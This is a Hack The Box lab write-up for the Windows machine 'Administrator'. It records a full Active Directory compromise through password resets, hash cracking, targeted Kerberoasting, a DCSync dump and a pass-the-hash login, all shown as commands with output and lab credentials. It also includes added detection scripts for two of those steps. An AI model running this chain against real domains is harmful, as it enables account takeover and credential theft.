
HTB Administrator done

Administrator

OS:

Windows

Technology:

IP Address:

10.129.49.189

Open ports:

21/tcp    open  ftp           Microsoft ftpd
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-26 06:35:10Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
64202/tcp open  msrpc         Microsoft Windows RPC
65243/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
65248/tcp open  msrpc         Microsoft Windows RPC
65259/tcp open  msrpc         Microsoft Windows RPC
65270/tcp open  msrpc         Microsoft Windows RPC

Users and pass:

I know the username because it was given on the website: https://app.hackthebox.com/machines/634
L: olivia
P: ichliebedich
---
L: michael
P: Qwerty123
---
L: benjamin
P: Qwerty123
---
Password to backup.psafe3

Password: tekieromucho
---
Logins and passwords inside PasswordSafe

Alexander Smith
U: alexander
P: UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
___
Emily Rodriguez
U: emily
P: UXLCI5iETUsIBoFVTj8yQFKoHjXmb
___
Emma Johnson
U: emma
P: WwANQWnmJnGV07WQN8bMS7FMAbjNur
---
Cracking password for user ethan (krb5tgs)
L: ethan
P: limpbizkit

Nmap

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.49.189_nmap 10.129.49.189 ; cat 10.129.49.189_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 18:34 EST
Nmap scan report for 10.129.49.189
Host is up (0.034s latency).
Not shown: 65510 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-26 06:35:10Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
64202/tcp open  msrpc         Microsoft Windows RPC
65243/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
65248/tcp open  msrpc         Microsoft Windows RPC
65259/tcp open  msrpc         Microsoft Windows RPC
65270/tcp open  msrpc         Microsoft Windows RPC

SMB

List all shares for user olivia

I know the username because it was given on the website: https://app.hackthebox.com/machines/634
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ nxc smb 10.129.49.189 -u 'olivia' -p 'ichliebedich' --shares          
SMB         10.129.49.189   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.49.189   445    DC               [+] administrator.htb\olivia:ichliebedich 
SMB         10.129.49.189   445    DC               [*] Enumerated shares
SMB         10.129.49.189   445    DC               Share           Permissions     Remark
SMB         10.129.49.189   445    DC               -----           -----------     ------
SMB         10.129.49.189   445    DC               ADMIN$                          Remote Admin
SMB         10.129.49.189   445    DC               C$                              Default share
SMB         10.129.49.189   445    DC               IPC$            READ            Remote IPC
SMB         10.129.49.189   445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.49.189   445    DC               SYSVOL          READ            Logon server share 

List and download share: SYSVOL (rabbit hole)

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ smbclient //10.129.49.189/SYSVOL -U 'Olivia%ichliebedich'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Oct  4 15:48:08 2024
  ..                                  D        0  Fri Oct  4 15:48:08 2024
  administrator.htb                  Dr        0  Fri Oct  4 15:48:08 2024

        5606911 blocks of size 4096. 1257441 blocks available
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \administrator.htb\DfsrPrivate\*
getting file \administrator.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as administrator.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \administrator.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2802 as administrator.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (7.4 KiloBytes/sec) (average 4.3 KiloBytes/sec)
getting file \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\comment.cmtx of size 553 as administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/comment.cmtx (4.0 KiloBytes/sec) (average 4.3 KiloBytes/sec)
getting file \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Registry.pol of size 184 as administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Registry.pol (1.3 KiloBytes/sec) (average 3.8 KiloBytes/sec)
getting file \administrator.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as administrator.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (7.9 KiloBytes/sec) (average 4.4 KiloBytes/sec)
getting file \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 4262 as administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (30.8 KiloBytes/sec) (average 7.4 KiloBytes/sec)
smb: \> exit

Login as user: Olivia via evil-winrm

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ evil-winrm -i 10.129.98.156 -u 'olivia' -p 'ichliebedich'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\olivia\Desktop> dir
*Evil-WinRM* PS C:\Users\olivia\Desktop> whoami /all

USER INFORMATION
----------------

User Name            SID
==================== ============================================
administrator\olivia S-1-5-21-1088858960-373806567-254189436-1108


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\olivia\Desktop> 

Bloodhound

Run bloodhound-python

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ bloodhound-python -d administrator.htb -ns 10.129.98.156 -u olivia -p ichliebedich -c All --zip
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.administrator.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 07S
INFO: Compressing output into 20241127180209_bloodhound.zip

Findings in Bloodhound

User Olivia has "GenericAll" for Michael

She can change the password for user Michael
---
*Evil-WinRM* PS C:\Users\olivia\Desktop> net user /domain

User accounts for \\

-------------------------------------------------------------------------------
Administrator            alexander                benjamin
emily                    emma                     ethan
Guest                    krbtgt                   michael
olivia
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\olivia\Desktop> net user michael Qwerty123 /domain
The command completed successfully.
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ evil-winrm -i 10.129.98.156 -u 'michael' -p 'Qwerty123'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\michael\Documents> dir
*Evil-WinRM* PS C:\Users\michael\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\michael\Desktop> dir
*Evil-WinRM* PS C:\Users\michael\Desktop> whoami /all

USER INFORMATION
----------------

User Name             SID
===================== ============================================
administrator\michael S-1-5-21-1088858960-373806567-254189436-1109


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\michael\Desktop> 

User Michael can change password for user Benjamin

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ rpcclient -U michael 10.129.98.156
Password for [WORKGROUP\michael]:
rpcclient $> setuserinfo2 benjamin 23 'Qwerty123'
rpcclient $> exit

User Benjamin has MemberOf Share Moderators

Download file: Backup.psafe3 from ftp

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ ftp -A 10.129.98.156 
Connected to 10.129.98.156.
220 Microsoft FTP Service
Name (10.129.98.156:kali): benjamin
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 EPRT command successful.
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp> mget Backup.psafe3
mget Backup.psafe3 [anpqy?]? y
200 EPRT command successful.
125 Data connection already open; Transfer starting.
100% |************************************************************************|   952       24.21 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (22.89 KiB/s)
ftp> exit
221 Goodbye.

Password Safe

Download Password Safe application

Download from this website: [Password Safe](https://sourceforge.net/projects/passwordsafe/)

Run Password Safe

I see we need a password to open the Backup file

Cracking password for backup.psafe3

Password: tekieromucho
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ hashcat -m5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-penryn-Intel(R) Core(TM) i7-8850H CPU @ 2.60GHz, 2823/5710 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

ATTENTION! Potfile storage is disabled for this hash mode.
Passwords cracked during this session will NOT be stored to the potfile.
Consider using -o to save cracked passwords.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

Backup.psafe3:tekieromucho                                

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5200 (Password Safe v3)
Hash.Target......: Backup.psafe3
Time.Started.....: Wed Nov 27 19:28:26 2024 (1 sec)
Time.Estimated...: Wed Nov 27 19:28:27 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     6145 H/s (2.41ms) @ Accel:512 Loops:32 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 6144/14344385 (0.04%)
Rejected.........: 0/6144 (0.00%)
Restore.Point....: 4096/14344385 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2048-2049
Candidate.Engine.: Device Generator
Candidates.#1....: newzealand -> iheartyou
Hardware.Mon.#1..: Util: 50%

Started: Wed Nov 27 19:27:43 2024
Stopped: Wed Nov 27 19:28:29 2024

Open application PasswordSafe

Password: tekieromucho
---
I found 3 records with logins and passwords
Alexander Smith
U: alexander
P: UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
___
Emily Rodriguez
U: emily
P: UXLCI5iETUsIBoFVTj8yQFKoHjXmb
___
Emma Johnson
U: emma
P: WwANQWnmJnGV07WQN8bMS7FMAbjNur

Bloodhound

Find user: emily

User Emily has priv: GenericWrite for user Ethan

Create an SPN

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ sudo ntpdate administrator.htb
2024-11-29 06:29:05.966884 (+0000) +25199.931520 +/- 0.017047 administrator.htb 10.129.63.212 s1 no-leap
CLOCK: time stepped by 25199.931520
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Administrator/targetedKerberoast]
└─$ python3 targetedKerberoast.py -d administrator.htb -u emily -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb"
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$e8b2185e11a032256b697323b2d19149$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

Cracking krb5t hash for user ethan

L: ethan
P: limpbizkit
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ hashcat krb5t.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-penryn-Intel(R) Core(TM) i7-8850H CPU @ 2.60GHz, 2823/5710 MB (1024 MB allocatable), 4MCU

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$e8b2185e11a032256b697323b2d19149$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:limpbizkit

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator....81aa21
Time.Started.....: Thu Nov 28 23:35:23 2024 (0 secs)
Time.Estimated...: Thu Nov 28 23:35:23 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   493.1 kH/s (2.53ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 6144/14344385 (0.04%)
Rejected.........: 0/6144 (0.00%)
Restore.Point....: 4096/14344385 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: newzealand -> iheartyou
Hardware.Mon.#1..: Util: 27%

Started: Thu Nov 28 23:35:06 2024
Stopped: Thu Nov 28 23:35:24 2024
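
Defender's view of the SPN and krb5tgs steps above, as an added example that is not part of the original notes: a Python check that correlates a servicePrincipalName write on a user object (Security event 5136) with an RC4 (etype 23, 0x17) service-ticket request for that same account (event 4769). The event records, the DN-to-account map and the 10-minute window are constructed assumptions.

```python
from datetime import datetime, timedelta

SPN_ADDED, SPN_DELETED = "%%14674", "%%14675"  # 5136 OperationType: value added / deleted
RC4_HMAC = "0x17"                 # etype 23, the "$krb5tgs$23$" prefix seen in the hash
WINDOW = timedelta(minutes=10)    # assumption: tune to the environment

# Assumption: in production this mapping comes from a directory lookup.
DN_TO_SAM = {
    "CN=ethan,CN=Users,DC=administrator,DC=htb": "ethan",
    "CN=svc_sql,CN=Users,DC=administrator,DC=htb": "svc_sql",
}

# Constructed sample records using the field names of events 5136 and 4769.
EVENTS = [
    {"EventID": 5136, "TimeCreated": "2024-11-29T05:00:00", "SubjectUserName": "Administrator",
     "ObjectDN": "CN=svc_sql,CN=Users,DC=administrator,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": SPN_ADDED},
    {"EventID": 4769, "TimeCreated": "2024-11-29T05:01:00", "TargetUserName": "app@ADMINISTRATOR.HTB",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x12", "Status": "0x0",
     "IpAddress": "::ffff:192.0.2.20"},           # AES ticket: not flagged
    {"EventID": 4769, "TimeCreated": "2024-11-29T06:00:00", "TargetUserName": "app@ADMINISTRATOR.HTB",
     "ServiceName": "legacyapp", "TicketEncryptionType": RC4_HMAC, "Status": "0x0",
     "IpAddress": "::ffff:192.0.2.20"},           # RC4 but no recent SPN write: not this rule
    {"EventID": 5136, "TimeCreated": "2024-11-29T06:29:10", "SubjectUserName": "emily",
     "ObjectDN": "CN=ethan,CN=Users,DC=administrator,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": SPN_ADDED},
    {"EventID": 4769, "TimeCreated": "2024-11-29T06:29:11", "TargetUserName": "emily@ADMINISTRATOR.HTB",
     "ServiceName": "ethan", "TicketEncryptionType": RC4_HMAC, "Status": "0x0",
     "IpAddress": "::ffff:192.0.2.10"},
    {"EventID": 5136, "TimeCreated": "2024-11-29T06:29:12", "SubjectUserName": "emily",
     "ObjectDN": "CN=ethan,CN=Users,DC=administrator,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": SPN_DELETED},
]


def _ts(event):
    return datetime.fromisoformat(event["TimeCreated"])


def find_targeted_kerberoast(events, dn_to_sam=DN_TO_SAM, window=WINDOW):
    """Return one finding per RC4 TGS request that follows a fresh SPN write on a user."""
    pending = {}    # sAMAccountName -> the 5136 event that added an SPN to it
    findings = []
    for e in sorted(events, key=_ts):
        is_spn_write = (
            e["EventID"] == 5136
            and e.get("ObjectClass") == "user"   # computer objects legitimately carry SPNs
            and e.get("AttributeLDAPDisplayName", "").lower() == "serviceprincipalname"
        )
        if is_spn_write:
            sam = dn_to_sam.get(e["ObjectDN"])
            if sam is None:
                continue
            sam = sam.lower()
            if e["OperationType"] == SPN_ADDED:
                pending[sam] = e
            elif e["OperationType"] == SPN_DELETED:
                # An SPN that disappears again right after the request is a stronger signal.
                for f in findings:
                    if f["service_account"] == sam and _ts(e) - f["spn_added"] <= window:
                        f["spn_removed_again"] = True
        elif (e["EventID"] == 4769 and e.get("TicketEncryptionType") == RC4_HMAC
              and e.get("Status") == "0x0"):
            svc = e["ServiceName"].lower()
            added = pending.get(svc)
            if added is not None and _ts(e) - _ts(added) <= window:
                findings.append({
                    "service_account": svc,
                    "spn_writer": added["SubjectUserName"],
                    "requester": e["TargetUserName"],
                    "client": e["IpAddress"],
                    "spn_added": _ts(added),
                    "seconds_to_request": (_ts(e) - _ts(added)).total_seconds(),
                    "spn_removed_again": False,
                })
    return findings


if __name__ == "__main__":
    for finding in find_targeted_kerberoast(EVENTS):
        print(finding)
```

Event 5136 is only logged when directory service change auditing is enabled and the object's SACL covers the write.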

Get hash for user: Administrator

We see that ethan has DCSync; he can dump all passwords for AD
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py administrator.htb/ethan:[email protected]
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
[*] Kerberos keys grabbed
[*] Cleaning up... 
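
How the DRSUAPI replication above looks from the domain controller's side, as an added example that is not part of the original notes: a Python check over Security event 4662 records that reports any account exercising the directory replication extended rights unless it is a known domain controller or sync account. The event records, the `WS01$` host and the `sync_svc` allowlist entry are constructed assumptions.

```python
import re
from collections import defaultdict

# Control-access right GUIDs that appear in the Properties field of event 4662.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"\{([0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12})\}")

# Accounts expected to replicate. Allowlist the DCs by name rather than skipping
# every machine account, so another computer account still gets reported.
# "sync_svc" is a hypothetical directory-sync service account.
ALLOWED = {"dc$", "sync_svc"}

# Constructed sample records using the field names of event 4662.
DS_ACCESS_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC$", "AccessMask": "0x100",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "ethan", "AccessMask": "0x100",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "ethan", "AccessMask": "0x100",
     "Properties": "%%7688\n\t{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "olivia", "AccessMask": "0x10",
     "Properties": "%%7684\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}"},   # ordinary read
    {"EventID": 4662, "SubjectUserName": "WS01$", "AccessMask": "0x100",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def find_replication_by_non_dc(events, allowed=ALLOWED):
    """Group replication rights exercised per account, ignoring allowlisted accounts."""
    seen = defaultdict(set)
    for e in events:
        if e.get("EventID") != 4662:
            continue
        account = e["SubjectUserName"].lower()
        if account in allowed:
            continue
        for guid in GUID_RE.findall(e.get("Properties", "")):
            right = REPL_RIGHTS.get(guid.lower())
            if right:
                seen[account].add(right)
    findings = []
    for account, rights in sorted(seen.items()):
        # Get-Changes-All is the right that exposes password hashes and Kerberos keys.
        severity = "high" if "DS-Replication-Get-Changes-All" in rights else "medium"
        findings.append({"account": account, "rights": sorted(rights), "severity": severity})
    return findings


if __name__ == "__main__":
    for finding in find_replication_by_non_dc(DS_ACCESS_EVENTS):
        print(finding)
```

Event 4662 is only produced when directory service access auditing is enabled and the domain object has an auditing entry (SACL) for these rights.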

Read flag: root.txt

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ evil-winrm -i administrator.htb -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---        11/28/2024   9:52 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
cc25a29023e54ed422557cbd3284c1cc
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig

Windows IP Configuration


